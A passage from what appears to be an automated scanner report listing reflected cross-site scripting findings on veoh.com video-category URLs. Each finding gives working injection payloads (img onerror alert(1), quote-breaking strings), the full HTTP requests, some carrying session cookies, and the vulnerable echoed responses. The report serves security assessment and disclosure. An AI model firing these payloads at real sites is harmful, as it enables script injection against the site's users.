Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6a1e'%3b1b1f85b69a1 was submitted in the REST URL parameter 6. This input was echoed as c6a1e';1b1f85b69a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8c6a1e'%3b1b1f85b69a1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'088ee77b63d79318cd9540d1099eeade',
'v18978294NGnK88j8c6a1e';1b1f85b69a1'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.404. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41 was submitted in the REST URL parameter 4. This input was echoed as 2e455<img src=a onerror=alert(1)>cd67645eb41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:55 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 76407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure2e455<img src=a onerror=alert(1)>cd67645eb41"}</textarea>
...[SNIP]...

3.405. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0 was submitted in the REST URL parameter 4. This input was echoed as 5ce45"><img src=a onerror=alert(1)>b926a16b5e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=9F8A0036-A353-DB95-6D07-AA38C789D992&LastUpdate=03/Feb/2011:12:31:41 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:41 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=16
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure5ce45"><img src=a onerror=alert(1)>b926a16b5e0/sort/most viewed" selected="selected">
...[SNIP]...

3.406. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a478'%3b93eafa27de4 was submitted in the REST URL parameter 6. This input was echoed as 3a478';93eafa27de4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j83a478'%3b93eafa27de4/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=D47A8979-9A2D-F75C-94BC-F44EB9A27CFA&LastUpdate=03/Feb/2011:12:32:06 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:06 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=35
Content-Length: 94943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'1757659a2efcb124c29be93d82aed870',
'v18978294NGnK88j83a478';93eafa27de4'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.407. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815 was submitted in the REST URL parameter 4. This input was echoed as 4957f"><img src=a onerror=alert(1)>b411440d815 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:38 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure4957f"><img src=a onerror=alert(1)>b411440d815/sort/most viewed" selected="selected">
...[SNIP]...

3.408. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9 was submitted in the REST URL parameter 4. This input was echoed as 19a20<img src=a onerror=alert(1)>17a886b7f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure19a20<img%20src%3da%20onerror%3dalert(1)>17a886b7f9/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=E878E920-D63B-9E1C-A81F-F0235D74FE12&LastUpdate=03/Feb/2011:12:31:53 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:53 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 76397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure19a20<img src=a onerror=alert(1)>17a886b7f9"}</textarea>
...[SNIP]...

3.409. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8770d'%3bee4aadffdc5 was submitted in the REST URL parameter 6. This input was echoed as 8770d';ee4aadffdc5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j88770d'%3bee4aadffdc5/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=FED204EF-9DC2-336D-4AB6-05EAB5021E64&LastUpdate=03/Feb/2011:12:32:04 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:04 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 94943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'9aef285b016775eac1368647ddf6c815',
'v18978294NGnK88j88770d';ee4aadffdc5'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.410. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0 was submitted in the REST URL parameter 4. This input was echoed as 3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=33
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0/sort/most viewed" selected="selected">
...[SNIP]...

3.411. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb was submitted in the REST URL parameter 4. This input was echoed as 5c238<img src=a onerror=alert(1)>411e688a8fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure5c238<img src=a onerror=alert(1)>411e688a8fb"}</textarea>
...[SNIP]...

3.412. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a62'%3b78d21d340d1 was submitted in the REST URL parameter 6. This input was echoed as 47a62';78d21d340d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN47a62'%3b78d21d340d1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:58 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'f34e2f7249b7650fa7584894a2fd62df',
'v207484775fTsGMdN47a62';78d21d340d1'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.413. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72 was submitted in the REST URL parameter 4. This input was echoed as 89285<img src=a onerror=alert(1)>bd2cbbace72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure89285<img src=a onerror=alert(1)>bd2cbbace72"}</textarea>
...[SNIP]...

3.414. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6 was submitted in the REST URL parameter 4. This input was echoed as 43948"><img src=a onerror=alert(1)>46bf4b641b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:11 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure43948"><img src=a onerror=alert(1)>46bf4b641b6/sort/most viewed" selected="selected">
...[SNIP]...

3.415. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1503'%3b3c33fe8edd6 was submitted in the REST URL parameter 6. This input was echoed as a1503';3c33fe8edd6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZCa1503'%3b3c33fe8edd6 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
